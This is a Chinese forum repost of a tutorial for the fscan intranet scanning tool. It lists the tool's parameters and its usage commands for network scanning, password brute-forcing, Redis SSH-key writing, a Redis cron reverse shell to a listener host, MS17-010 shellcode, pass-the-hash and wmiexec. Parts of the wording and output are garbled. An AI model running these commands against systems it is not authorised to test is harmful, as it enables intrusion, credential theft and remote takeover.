温锦文欧普厨电及净水器总代理 发表于 2024-9-26 15:00:05

内网漏扫工具fscan

一、先容:
fscan是一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划使命反弹shell、读取win网卡信息、web指纹辨认、web弊端扫描、netbios探测、域控辨认等功能。
二、主要功能
1.信息搜集:
存活探测(icmp)
端口扫描
2.爆破功能:
各类服务爆破(ssh、smb、rdp等)
数据库密码爆破(mysql、mssql、redis、psql、oracle等)
3.系统信息、弊端扫描:
netbios探测、域控辨认
获取目的网卡信息
高危弊端扫描(ms17010等)
4.Web探测功能:
webtitle探测
web指纹辨认(常见cms、oa框架等)
web弊端扫描(weblogic、st2等,支持xray的poc)
5.弊端使用:
redis写公钥或写计划使命
ssh命令执行
ms17017使用(植入shellcode),如添加用户等
6.其他功能:
文件生存 
三、安装
下载地址
https://github.com/shadow1ng/fscan/releases
https://i-blog.csdnimg.cn/direct/1132f63b073a43288ad49738bbd5a7f5.png
 三、参数阐明
Usage of fscan.exe:
-br int
      Brute threads (default 1)
-c string
      exec command (ssh|wmiexec)
-cookie string
      set poc cookie,-cookie rememberMe=login
-debug int
      every time to LogErr (default 60)
-dns
      using dnslog poc
-domain string
      smb domain
-full
      poc full scan,as: shiro 100 key
-h string
      IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12 | 192.168.1.0/24
-hash string
      hash
-hf string
      host file, -hf ip.txt
-hn string
      the hosts no scan,as: -hn 192.168.1.1/24
-json
      json output
-m string
      Select scan type ,as: -m ssh (default "all")
-no
      not to save output log
-nobr
      not to Brute password
-nocolor
      no color
-nopoc
      not to scan web vul
-noredis
      no redis sec test
-np
      not to ping
-num int
      poc rate (default 20)
-o string
      Outputfile (default "result.txt")
-p string
      Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")
-pa string
      add port base DefaultPorts,-pa 3389
-path string
      fcgi、smb romote file path
-ping
      using ping replace icmp
-pn string
      the ports no scan,as: -pn 445
-pocname string
      use the pocs these contain pocname, -pocname weblogic
-pocpath string
      poc file path
-portf string
      Port File
-proxy string
      set poc proxy, -proxy http://127.0.0.1:8080
-pwd string
      password
-pwda string
      add a password base DefaultPasses,-pwda password
-pwdf string
      password file
-rf string
      redis file to write sshkey file (as: -rf id_rsa.pub)
-rs string
      redis shell to write cron file (as: -rs 192.168.1.1:6666)
-sc string
      ms17 shellcode,as -sc add
-silent
      silent scan
-socks5 string
      set socks5 proxy, will be used in tcp connection, timeout setting will not work
-sshkey string
      sshkey file (id_rsa)
-t int
      Thread nums (default 600)
-time int
      Set timeout (default 3)
-top int
      show live len top (default 10)
-u string
      url
-uf string
      urlfile
-user string
      username
-usera string
      add a user base DefaultUsers,-usera user
-userf string
      username file
-wmi
      start wmi
-wt int
      Set web timeout (default 5) 五、使用方法
简单用法
fscan.exe -h 192.168.1.1/24(默认使用全部模块)
fscan.exe -h 192.168.1.1/16(B段扫描)
其他用法
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)
fscan.exe -h 192.168.1.1/8(A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt(以文件导入)
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)
六、举例阐明:
1.端口扫描:Fscan可以扫描目的主机上的TCP端口,发现开放的服务和弊端。
可以使用以下命令扫描目的主机的TCP端口:
fscan.exe -h 域名、ip地址或者网段
该命令将扫描域名、ip地址或者网段的全部TCP端口,并列出开放的端口和运行的服务。
https://i-blog.csdnimg.cn/direct/ba1efeef7c084f6b9e903d1fd6ccf4b0.png
2. 服务爆破
可以或许对服务进行爆破,可以使用内置的字典,也可以本身指定字典
查看可爆破的服务
fscan.exe -h ip地址 -m -h查看可爆破的服务,-m指定爆破类型

   ___                              _
/ _ \   ______ _ __ __ ____| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/   |___/\___|_|\__,_|\___|_|\_\
                     fscan version: 1.8.4
The specified scan type does not exist
-m
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
   
mysql爆破
如下,指定对某个主机的psql服务进行爆破
fscan.exe -h ip -m psql        #使用默认的字典
fscan.exe -h ip -m psql  -userf user.txt -pwdf passwd.txt      #使用指定的字典 https://i-blog.csdnimg.cn/direct/d893b74a1c334ff1b9a93397866bb7f5.png
默认对全部服务爆破
如下,指定对多个主机默认全部服务进行爆破
fscan.exe -h ip1,ip2 -m all  -userf user.txt -pwdf passwd.txt 

免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页: [1]
查看完整版本: 内网漏扫工具fscan